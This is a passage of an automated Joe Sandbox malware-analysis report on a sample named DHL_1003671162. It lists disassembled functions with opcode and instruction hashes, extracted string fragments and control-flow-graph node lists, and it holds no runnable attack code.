                                                • Opcode Fuzzy Hash: 9f0aa10f3f11bb08ec4d35de136dc2574c25c6955082b42ad27443f059233201
                                                • Instruction Fuzzy Hash: EF81D3B4E102498FDB08CFAAC984AEEBBB2FF89300F14942AD915AB354D7349905CF54
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 071B66F9 Relevance: 1.6, Strings: 1, Instructions: 347COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1705059721.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_71b0000_DHL_1003671162.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: tIh
                                                • API String ID: 0-443931868
                                                • Opcode ID: 8f3332f5ba8bb9006374464d1222eed6b99313443e21b937310446cacfe663a4
                                                • Instruction ID: 4fee9161b6553445ff333195fda2bd31f0d40e540d1f97f3833c49556f1d5fb2
                                                • Opcode Fuzzy Hash: 8f3332f5ba8bb9006374464d1222eed6b99313443e21b937310446cacfe663a4
                                                • Instruction Fuzzy Hash: 1DE16CB0E14206CFCB18CFA9C4818EEFBB2FF59301B15D556D816AB255D734AA42CF94
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 071B6715 Relevance: 1.6, Strings: 1, Instructions: 336COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1705059721.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_71b0000_DHL_1003671162.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: tIh
                                                • API String ID: 0-443931868
                                                • Opcode ID: 947c8b387339818d78c27bafb7a6291caa1047e0473b57dda24401f20a85786f
                                                • Instruction ID: 3e0634e4e9ce5e9e0d435cca1b295d3375e1d9009ff784d144471816caf84cff
                                                • Opcode Fuzzy Hash: 947c8b387339818d78c27bafb7a6291caa1047e0473b57dda24401f20a85786f
                                                • Instruction Fuzzy Hash: 40E15EB0E14206CFCB18CFA9C5818AEFBB2FF59300B15D555D816AB255D734EA42CF94
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 071B6756 Relevance: 1.6, Strings: 1, Instructions: 327COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1705059721.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_71b0000_DHL_1003671162.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: tIh
                                                • API String ID: 0-443931868
                                                • Opcode ID: 8cd5e4a4f9b4a5abfcb94f9c7e258599ea51b9bccea1520e431d2d6ae813bd23
                                                • Instruction ID: f6b478744a2716ee36397159706f267b185722882e648ece82f822dc73380900
                                                • Opcode Fuzzy Hash: 8cd5e4a4f9b4a5abfcb94f9c7e258599ea51b9bccea1520e431d2d6ae813bd23
                                                • Instruction Fuzzy Hash: E0D14DB0D1420ADFCB18CFA9C4818EEFBB2FF59301B11D556D816AB255D734AA42CF94
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 071B6798 Relevance: 1.6, Strings: 1, Instructions: 302COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1705059721.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_71b0000_DHL_1003671162.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: tIh
                                                • API String ID: 0-443931868
                                                • Opcode ID: aff4e41f9144a1c606c6f6b87310c6eaf4faf7ddc96b75c469c5688e9f298120
                                                • Instruction ID: 8ef57f623fb4aef16ab0629ad0dcbcefd49cdffe3a8c32377d92d8629bf22e79
                                                • Opcode Fuzzy Hash: aff4e41f9144a1c606c6f6b87310c6eaf4faf7ddc96b75c469c5688e9f298120
                                                • Instruction Fuzzy Hash: B1D149B0E1520ADFCB18CFA5C4818AEFBB2FF99301F10D555D816AB254D734AA42CF94
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0AE8CDE0 Relevance: .6, Instructions: 585COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1707211800.000000000AE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AE80000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_ae80000_DHL_1003671162.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5369b72f45b1e7489a50abf2daa758d0a9c88e77af036511ebff72bbe1806ef2
                                                • Instruction ID: ecca7fb87e137403f7e6538e2e35abc1f8c5a6f0d4d7551abd61492f2619f475
                                                • Opcode Fuzzy Hash: 5369b72f45b1e7489a50abf2daa758d0a9c88e77af036511ebff72bbe1806ef2
                                                • Instruction Fuzzy Hash: 0E22BE747012049FDB19EB69C990BAE77F7AF89704F284469E10ADB3A1CB35ED02CB51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 071B9830 Relevance: .2, Instructions: 241COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1705059721.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_71b0000_DHL_1003671162.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4811b69dd140494a196d8b0420333fb691a8d9e5d69a725ccff4ea5594697487
                                                • Instruction ID: 5966f73c3c28b55b771f0b26a16696e10a36d987eb62ec338a3a462c2ee9e970
                                                • Opcode Fuzzy Hash: 4811b69dd140494a196d8b0420333fb691a8d9e5d69a725ccff4ea5594697487
                                                • Instruction Fuzzy Hash: 7AA149B0D15209DFCB58CFA5D6809DDFBB6FB8A300F20A41AE516BB264D734A946CF14
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0AE8AD94 Relevance: .2, Instructions: 220COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1707211800.000000000AE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AE80000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_ae80000_DHL_1003671162.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: af27031cc2fe423a984aa21469a1aedbac274a4ab654f900aff08415b1ac58a4
                                                • Instruction ID: a28d901f4a1b7403198aa4d23360a144e9a7be05824c52d60d28571220b2542e
                                                • Opcode Fuzzy Hash: af27031cc2fe423a984aa21469a1aedbac274a4ab654f900aff08415b1ac58a4
                                                • Instruction Fuzzy Hash: 959112B1E45229DFDB24DF6AC8407EDB7B6AF89300F14A1AAD40DA7251DB745AC1CF40
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 071B9519 Relevance: .2, Instructions: 206COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1705059721.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_71b0000_DHL_1003671162.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 04b3c36a31de9afccf276a3b3be461faafa95abe7e65f51ad9f1a270eba6abba
                                                • Instruction ID: c280ffa05b3eb5225e5a89a8e62882b7d8171a6f23a352199fbba40791683f0c
                                                • Opcode Fuzzy Hash: 04b3c36a31de9afccf276a3b3be461faafa95abe7e65f51ad9f1a270eba6abba
                                                • Instruction Fuzzy Hash: B48102B4E54219DFCB04CFA9C8809EEFBB2FF89300F10955AD901AB254D738A912CF54
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 071B9528 Relevance: .2, Instructions: 204COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1705059721.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_71b0000_DHL_1003671162.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a0c847561bdc6e8860d0635d86e4ea1704c90fbc5e08331c5cc59af6e751e18a
                                                • Instruction ID: e147f1520cde5c62e0a51803a3d0be70057a47c1d2d765ae8491b122f3019cbf
                                                • Opcode Fuzzy Hash: a0c847561bdc6e8860d0635d86e4ea1704c90fbc5e08331c5cc59af6e751e18a
                                                • Instruction Fuzzy Hash: 6181F0B4E14229DFCB04CFA9C8809EEFBB2FB89300F10955AD911BB254D738A952CF54
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 071B58D8 Relevance: .1, Instructions: 75COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1705059721.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_71b0000_DHL_1003671162.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2ccb8d61bd5f7e1cedc9f98b9bd413d10422d81365dd06c0fbb3b1544818e853
                                                • Instruction ID: c8eb66d8a5c8183d2c04e7ff0f45c26bd5771e4b45504767068b70dd248ae972
                                                • Opcode Fuzzy Hash: 2ccb8d61bd5f7e1cedc9f98b9bd413d10422d81365dd06c0fbb3b1544818e853
                                                • Instruction Fuzzy Hash: 6F212AB1E016198BEB18CFABD9442DEFBF7AFC9310F14C06AD408A6264DB745A55CB50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0AE81F18 Relevance: .1, Instructions: 69COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1707211800.000000000AE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AE80000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_ae80000_DHL_1003671162.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: af0cc49e737960f80820e9a1e8eb44b8ee26af5c772b62a4d5119f554beb06fc
                                                • Instruction ID: 09222dee4b88ee8aed80b3ed2f7295ecfaca7ee975a42b434af80c342c044829
                                                • Opcode Fuzzy Hash: af0cc49e737960f80820e9a1e8eb44b8ee26af5c772b62a4d5119f554beb06fc
                                                • Instruction Fuzzy Hash: D421E4B1D056189BEB18CFA7D8457EEFFB6AFC8300F14D16AD40866254DB7409458FA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0AE81F28 Relevance: .1, Instructions: 57COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1707211800.000000000AE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AE80000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_ae80000_DHL_1003671162.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0e6aa0c72ce5164a45afa7358fb81869a18d17526d33edb33c62532e8045c9b0
                                                • Instruction ID: 6f8c6109e87fcf83fff4ab9b22f1ea8a37b2f540c548945a138413ce2d64ccbd
                                                • Opcode Fuzzy Hash: 0e6aa0c72ce5164a45afa7358fb81869a18d17526d33edb33c62532e8045c9b0
                                                • Instruction Fuzzy Hash: 8D21D6B0D046189BEB18DFABC8447DEFEF6AFC8300F14D06AD40976254DB7409458FA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 071B1DC8 Relevance: 16.5, Strings: 13, Instructions: 282COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 294 71b1dc8 295 71b1dcd-71b1dd0 294->295 296 71b1de2-71b1de6 295->296 297 71b1dd2 295->297 309 71b1e09 296->309 310 71b1de8-71b1df1 296->310 297->296 298 71b204b-71b2053 297->298 299 71b1e9b-71b1ea5 297->299 300 71b2179-71b2182 297->300 301 71b2058-71b206b 297->301 302 71b1faf-71b1fc2 297->302 303 71b209c-71b20b2 297->303 304 71b1ebc-71b1ec0 297->304 305 71b2092-71b2097 297->305 306 71b2162-71b2176 297->306 307 71b1f60-71b1f64 297->307 308 71b2114-71b213e 297->308 298->295 314 71b1eab-71b1eb7 299->314 315 71b2185-71b219f 299->315 341 71b208b-71b2090 301->341 342 71b206d-71b2074 301->342 302->315 344 71b1fc8-71b1fd0 302->344 334 71b20c8 303->334 335 71b20b4-71b20c6 303->335 316 71b1ee3 304->316 317 71b1ec2-71b1ecb 304->317 305->295 312 71b1f87 307->312 313 71b1f66-71b1f6f 307->313 385 71b214a-71b2154 308->385 386 71b2140 308->386 311 71b1e0c-71b1e0e 309->311 318 71b1df8-71b1e05 310->318 319 71b1df3-71b1df6 310->319 322 71b1e10-71b1e16 311->322 323 71b1e26-71b1e43 311->323 327 71b1f8a-71b1faa 312->327 325 71b1f71-71b1f74 313->325 326 71b1f76-71b1f83 313->326 314->295 321 71b1ee6-71b1eea 316->321 330 71b1ecd-71b1ed0 317->330 331 71b1ed2-71b1edf 317->331 333 71b1e07 318->333 319->333 336 71b1eec-71b1efe 321->336 337 71b1f00 321->337 338 71b1e1a-71b1e24 322->338 339 71b1e18 322->339 362 71b1e66 323->362 363 71b1e45-71b1e4e 323->363 340 71b1f85 325->340 326->340 327->295 343 71b1ee1 330->343 331->343 333->311 347 71b20cb-71b20d8 334->347 335->347 348 71b1f03-71b1f07 336->348 337->348 338->323 339->323 340->327 354 71b2086 341->354 342->315 353 71b207a-71b2081 342->353 343->321 356 71b1ff3 344->356 357 71b1fd2-71b1fdb 344->357 378 71b20da-71b20e0 347->378 379 71b20f0-71b20fd 347->379 358 71b1f09-71b1f12 348->358 359 71b1f28 348->359 353->354 354->295 360 71b1ff6-71b1ff8 356->360 364 71b1fdd-71b1fe0 357->364 365 71b1fe2-71b1fef 357->365 368 71b1f19-71b1f1c 358->368 369 71b1f14-71b1f17 358->369 372 71b1f2b-71b1f4c 359->372 370 71b1ffa-71b2000 360->370 371 71b2016 360->371 375 71b1e69-71b1e92 call 71b34ef 362->375 373 71b1e50-71b1e53 363->373 374 71b1e55-71b1e62 363->374 366 71b1ff1 364->366 365->366 366->360 380 71b1f26 368->380 369->380 381 71b2002-71b2004 370->381 382 71b2006-71b2012 370->382 383 71b2018-71b201a 371->383 372->315 399 71b1f52-71b1f5b 372->399 384 71b1e64 373->384 374->384 403 71b1e98 375->403 387 71b20e2 378->387 388 71b20e4-71b20e6 378->388 379->315 390 71b2103-71b210f 379->390 380->372 389 71b2014 381->389 382->389 392 71b201c-71b2022 383->392 393 71b2034-71b2046 383->393 384->375 385->315 397 71b2156-71b2160 385->397 396 71b2145 386->396 387->379 388->379 389->383 390->295 400 71b2026-71b2032 392->400 401 71b2024 392->401 393->295 396->295 397->396 399->295 400->393 401->393 403->299
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1705059721.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_71b0000_DHL_1003671162.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: fcq$ fcq$ fcq$Te^q$Te^q$XX^q$XX^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                • API String ID: 0-1437089595
                                                • Opcode ID: e2cf52948565056b611961f74c3bf75537ba45615b0ee40482276865804463f1
                                                • Instruction ID: 1e25fc523f8ef3293862a69501d24028c104f81b9a491f190649ca924705084c
                                                • Opcode Fuzzy Hash: e2cf52948565056b611961f74c3bf75537ba45615b0ee40482276865804463f1
                                                • Instruction Fuzzy Hash: EEB194B0E1421DEFCB29CF94C9586EDB7B2BB85700F668459E502AF2D4C7309C49DB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 071B0448 Relevance: 14.2, Strings: 11, Instructions: 453COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 406 71b0448-71b0483 407 71b048e-71b04fe call 71b0314 406->407 565 71b0488 call 71b0b73 406->565 418 71b0503-71b0506 407->418 419 71b0508 418->419 420 71b050f-71b0519 418->420 419->420 421 71b053b-71b056f 419->421 422 71b059d-71b05a3 419->422 423 71b071c-71b0729 419->423 424 71b0731-71b073b 419->424 425 71b0630-71b0692 419->425 426 71b07f0 419->426 427 71b0697-71b06aa 419->427 428 71b07d4-71b07e1 419->428 429 71b05ea-71b05f1 419->429 430 71b07e9-71b07ee 419->430 431 71b074e 419->431 432 71b06c2-71b06c6 419->432 433 71b0580-71b058a 419->433 434 71b0787-71b078b 419->434 435 71b0605-71b060f 419->435 436 71b051f-71b052d 420->436 437 71b06ac 420->437 571 71b0571 call 71b2cf2 421->571 572 71b0571 call 71b2c57 421->572 446 71b05a9-71b05b5 422->446 447 71b05a5-71b05a7 422->447 423->424 448 71b073d-71b0749 424->448 449 71b0751-71b0776 424->449 425->418 470 71b07fd-71b0800 426->470 439 71b06b1 427->439 428->430 429->437 450 71b05f7-71b0600 429->450 451 71b077b-71b077e 430->451 431->451 440 71b06c8-71b06d1 432->440 441 71b06e7 432->441 442 71b058c 433->442 443 71b0596-71b059b 433->443 444 71b078d-71b0796 434->444 445 71b07ac 434->445 452 71b0618-71b061f 435->452 453 71b0611 435->453 436->437 438 71b0533-71b0539 436->438 437->439 438->418 456 71b06b6-71b06b9 439->456 458 71b06d8-71b06db 440->458 459 71b06d3-71b06d6 440->459 461 71b06ea-71b06ec 441->461 457 71b0591 442->457 443->422 443->457 462 71b0798-71b079b 444->462 463 71b079d-71b07a0 444->463 454 71b07af-71b07b1 445->454 464 71b05b7-71b05e5 446->464 447->464 448->456 449->451 450->418 451->434 460 71b0780 451->460 452->437 467 71b0625-71b062e 452->467 468 71b0613 453->468 487 71b07cd-71b07d2 454->487 488 71b07b3-71b07bd 454->488 456->432 474 71b06bb 456->474 457->418 475 71b06e5 458->475 459->475 460->426 460->428 460->430 460->434 477 71b090a-71b0983 460->477 478 71b0a8a-71b0aa1 460->478 479 71b09a8-71b09b6 460->479 480 71b0903-71b0905 460->480 481 71b0ad2-71b0ad9 460->481 482 71b0812-71b0816 460->482 483 71b09f5-71b0a6b 460->483 484 71b0854-71b0858 460->484 485 71b0708-71b070f 461->485 486 71b06ee-71b06f8 461->486 472 71b07aa 462->472 463->472 464->418 467->425 467->468 468->418 470->482 489 71b0802 470->489 472->454 474->423 474->424 474->426 474->428 474->430 474->431 474->432 474->434 474->477 475->461 555 71b099b-71b09a3 477->555 556 71b0985-71b098b 477->556 531 71b0ab9-71b0ac1 call 71be330 478->531 532 71b0aa3-71b0aa9 478->532 520 71b09b8-71b09be 479->520 521 71b09ce-71b09d5 479->521 480->470 490 71b0839 482->490 491 71b0818-71b0821 482->491 562 71b0a71-71b0a85 483->562 493 71b087b 484->493 494 71b085a-71b0863 484->494 485->449 500 71b0711-71b071a 485->500 486->449 499 71b06fa-71b0701 486->499 487->428 492 71b07cb 487->492 501 71b07bf-71b07c6 488->501 502 71b07f3-71b07f8 488->502 489->477 489->478 489->479 489->480 489->481 489->482 489->483 489->484 508 71b083c-71b0846 490->508 503 71b0828-71b0835 491->503 504 71b0823-71b0826 491->504 492->451 510 71b087e-71b08e8 493->510 506 71b086a-71b0877 494->506 507 71b0865-71b0868 494->507 511 71b0706 499->511 500->423 500->511 501->492 502->470 514 71b0837 503->514 504->514 516 71b0879 506->516 507->516 522 71b0851 508->522 553 71b08ea-71b08f0 510->553 554 71b0900 510->554 511->456 514->508 516->510 517 71b0577-71b057e 517->418 526 71b09c2-71b09c4 520->526 527 71b09c0 520->527 566 71b09da call 71bc898 521->566 567 71b09da call 71bc8a8 521->567 568 71b09da call 71bb294 521->568 569 71b09da call 71bb2b4 521->569 570 71b09da call 71bb2a4 521->570 522->484 526->521 527->521 546 71b0ac8-71b0acd 531->546 536 71b0aab 532->536 537 71b0aad-71b0aaf 532->537 534 71b09e0 542 71b09e8-71b09f0 534->542 536->531 537->531 542->470 546->470 560 71b08f2 553->560 561 71b08f4-71b08f6 553->561 554->480 555->470 558 71b098f-71b0991 556->558 559 71b098d 556->559 558->555 559->555 560->554 561->554 562->470 565->407 566->534 567->534 568->534 569->534 570->534 571->517 572->517
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1705059721.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_71b0000_DHL_1003671162.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Te^q$Te^q$Te^q$Te^q$Te^q$Te^q$Te^q$$^q$$^q$$^q$$^q
                                                • API String ID: 0-2818371802
                                                • Opcode ID: aea3c4b7d533382f6478cdf2ebe80100f7bc2cd50c5c74759f544fb568fac305
                                                • Instruction ID: 1a8244d34577a179dda15b9b916719ad1c7f7c472b629ba9b925ca804b2324e4
                                                • Opcode Fuzzy Hash: aea3c4b7d533382f6478cdf2ebe80100f7bc2cd50c5c74759f544fb568fac305
                                                • Instruction Fuzzy Hash: BAF171B4F40209DFDB289B69C9597BE76E2BB8C701F108425E842AB3D5DB74DC818B91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 071B0438 Relevance: 9.1, Strings: 7, Instructions: 396COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 573 71b0438-71b048e call 71b0b73 575 71b0494-71b04fe call 71b0314 573->575 585 71b0503-71b0506 575->585 586 71b0508 585->586 587 71b050f-71b0519 585->587 586->587 588 71b053b-71b054d 586->588 589 71b059d-71b05a3 586->589 590 71b071c-71b0729 586->590 591 71b0731-71b073b 586->591 592 71b0630-71b0692 586->592 593 71b07f0 586->593 594 71b0697-71b06aa 586->594 595 71b07d4-71b07e1 586->595 596 71b05ea-71b05f1 586->596 597 71b07e9-71b07ee 586->597 598 71b074e 586->598 599 71b06c2-71b06c6 586->599 600 71b0580-71b058a 586->600 601 71b0787-71b078b 586->601 602 71b0605-71b060f 586->602 603 71b051f-71b052d 587->603 604 71b06ac 587->604 662 71b0557-71b056f 588->662 613 71b05a9-71b05b5 589->613 614 71b05a5-71b05a7 589->614 590->591 615 71b073d-71b0749 591->615 616 71b0751-71b0776 591->616 592->585 637 71b07fd-71b0800 593->637 606 71b06b1 594->606 595->597 596->604 617 71b05f7-71b0600 596->617 618 71b077b-71b077e 597->618 598->618 607 71b06c8-71b06d1 599->607 608 71b06e7 599->608 609 71b058c 600->609 610 71b0596-71b059b 600->610 611 71b078d-71b0796 601->611 612 71b07ac 601->612 619 71b0618-71b061f 602->619 620 71b0611 602->620 603->604 605 71b0533-71b0539 603->605 604->606 605->585 623 71b06b6-71b06b9 606->623 625 71b06d8-71b06db 607->625 626 71b06d3-71b06d6 607->626 628 71b06ea-71b06ec 608->628 624 71b0591 609->624 610->589 610->624 629 71b0798-71b079b 611->629 630 71b079d-71b07a0 611->630 621 71b07af-71b07b1 612->621 631 71b05b7-71b05e5 613->631 614->631 615->623 616->618 617->585 618->601 627 71b0780 618->627 619->604 634 71b0625-71b062e 619->634 635 71b0613 620->635 654 71b07cd-71b07d2 621->654 655 71b07b3-71b07bd 621->655 623->599 641 71b06bb 623->641 624->585 642 71b06e5 625->642 626->642 627->593 627->595 627->597 627->601 644 71b090a-71b0983 627->644 645 71b0a8a-71b0aa1 627->645 646 71b09a8-71b09ab 627->646 647 71b0903-71b0905 627->647 648 71b0ad2-71b0ad9 627->648 649 71b0812-71b0816 627->649 650 71b09f5-71b0a53 627->650 651 71b0854-71b0858 627->651 652 71b0708-71b070f 628->652 653 71b06ee-71b06f8 628->653 639 71b07aa 629->639 630->639 631->585 634->592 634->635 635->585 637->649 656 71b0802 637->656 639->621 641->590 641->591 641->593 641->595 641->597 641->598 641->599 641->601 641->644 642->628 722 71b099b-71b09a3 644->722 723 71b0985-71b098b 644->723 698 71b0ab9-71b0ac1 call 71be330 645->698 699 71b0aa3-71b0aa9 645->699 676 71b09b4-71b09b6 646->676 647->637 657 71b0839 649->657 658 71b0818-71b0821 649->658 724 71b0a5d-71b0a6b 650->724 660 71b087b 651->660 661 71b085a-71b0863 651->661 652->616 667 71b0711-71b071a 652->667 653->616 666 71b06fa-71b0701 653->666 654->595 659 71b07cb 654->659 668 71b07bf-71b07c6 655->668 669 71b07f3-71b07f8 655->669 656->644 656->645 656->646 656->647 656->648 656->649 656->650 656->651 675 71b083c-71b0846 657->675 670 71b0828-71b0835 658->670 671 71b0823-71b0826 658->671 659->618 677 71b087e-71b08e8 660->677 673 71b086a-71b0877 661->673 674 71b0865-71b0868 661->674 737 71b0571 call 71b2cf2 662->737 738 71b0571 call 71b2c57 662->738 678 71b0706 666->678 667->590 667->678 668->659 669->637 681 71b0837 670->681 671->681 683 71b0879 673->683 674->683 689 71b0851 675->689 687 71b09b8-71b09be 676->687 688 71b09ce-71b09d5 676->688 720 71b08ea-71b08f0 677->720 721 71b0900 677->721 678->623 681->675 683->677 684 71b0577-71b057e 684->585 693 71b09c2-71b09c4 687->693 694 71b09c0 687->694 732 71b09da call 71bc898 688->732 733 71b09da call 71bc8a8 688->733 734 71b09da call 71bb294 688->734 735 71b09da call 71bb2b4 688->735 736 71b09da call 71bb2a4 688->736 689->651 693->688 694->688 713 71b0ac8-71b0acd 698->713 703 71b0aab 699->703 704 71b0aad-71b0aaf 699->704 701 71b09e0 709 71b09e8-71b09f0 701->709 703->698 704->698 709->637 713->637 727 71b08f2 720->727 728 71b08f4-71b08f6 720->728 721->647 722->637 725 71b098f-71b0991 723->725 726 71b098d 723->726 729 71b0a71-71b0a85 724->729 725->722 726->722 727->721 728->721 729->637 732->701 733->701 734->701 735->701 736->701 737->684 738->684
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1705059721.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_71b0000_DHL_1003671162.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Te^q$Te^q$Te^q$Te^q$Te^q$$^q$$^q
                                                • API String ID: 0-3830373724
                                                • Opcode ID: 5c34a5ce51225b0d8426a64da11ff2234ed4026b45e134694d1ca258e21d196f
                                                • Instruction ID: 27f4e15e12f819d41e676391235c39fc1684f40aa809b4d707d3b96c6a08ba4c
                                                • Opcode Fuzzy Hash: 5c34a5ce51225b0d8426a64da11ff2234ed4026b45e134694d1ca258e21d196f
                                                • Instruction Fuzzy Hash: 94E1A2B4B40205DFDB299B68C959BBE76E2FB8C701F108425E943AB3D4DB749C81CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 071B10A8 Relevance: 8.9, Strings: 7, Instructions: 114COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 740 71b10a8-71b10c3 741 71b10ca-71b10d0 740->741 742 71b10d9-71b1136 741->742 743 71b10d2 741->743 751 71b127c-71b1286 742->751 777 71b113c 742->777 743->742 744 71b122b-71b123c 743->744 745 71b11d8-71b11e9 743->745 746 71b114e-71b115f 743->746 747 71b120e-71b1215 743->747 748 71b1192-71b11a3 743->748 749 71b1142-71b1149 743->749 744->751 761 71b123e-71b127b 744->761 745->751 757 71b11ef-71b1206 745->757 746->751 758 71b1165-71b117c 746->758 747->751 752 71b1217-71b1226 747->752 748->751 762 71b11a9-71b11c0 748->762 749->741 752->741 757->751 769 71b1208 757->769 758->751 770 71b1182-71b118d 758->770 762->751 768 71b11c6-71b11d3 762->768 768->741 769->747 770->741 777->749
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1705059721.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_71b0000_DHL_1003671162.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: LR^q$LR^q$LR^q$LR^q$$^q$$^q$$^q
                                                • API String ID: 0-1901060420
                                                • Opcode ID: 8c16f91d2b8b91358106b7f4012331900b21c2948e9e6548c9cf58fc347f8c84
                                                • Instruction ID: 8b42fcc39ad46ba1361a914ae83eb3f0a58f5da388716bd386dabd3b17ed8a6d
                                                • Opcode Fuzzy Hash: 8c16f91d2b8b91358106b7f4012331900b21c2948e9e6548c9cf58fc347f8c84
                                                • Instruction Fuzzy Hash: 0A41B3B4904249DFCB14DFA8C5A45AEBBB2FF44300F26C8A9C0125B3A5D731C945DBA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0289D088 Relevance: 6.1, APIs: 4, Instructions: 135threadCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
